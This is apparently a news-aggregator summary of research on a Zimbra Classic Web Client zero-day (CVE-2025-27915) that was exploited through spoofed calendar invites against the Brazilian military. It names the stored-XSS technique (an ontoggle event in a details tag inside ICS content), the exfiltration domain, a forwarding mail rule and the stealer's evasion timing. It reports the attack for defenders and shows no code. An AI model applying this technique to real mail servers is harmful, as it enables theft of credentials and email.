Particle.news
Download on the App Store
3 ARTICLES
·
2h ago

Zimbra Calendar Zero-Day Used in Targeted Attack on Brazilian Military

StrikeReady describes spoofed Libyan Navy invites that executed data-stealing JavaScript through CVE-2025-27915.

Image

Overview

  • Researchers say the exploitation began in early January, weeks before Zimbra issued fixes on January 27 in versions 9.0.0 P44, 10.0.13, and 10.1.5 without acknowledging active attacks.
  • The Classic Web Client flaw allows stored XSS via malicious ICS content that triggers an ontoggle event in a details tag to run arbitrary code in the user’s session.
  • The embedded script was a stealthy data stealer that exfiltrated credentials, emails, contacts, and shared folders to ffrk[.]net and installed a mail rule named Correo forwarding to [email protected].
  • Evasion features included a 60‑second start delay, execution only after a three‑day window, periodic data uploads roughly every four hours, and hidden UI elements to reduce user clues.
  • Attribution remains unclear, though researchers noted similarities to past campaigns by groups like UNC1151 and referenced broader XSS use by actors such as APT28, and they released IoCs and a deobfuscated payload to aid defenders.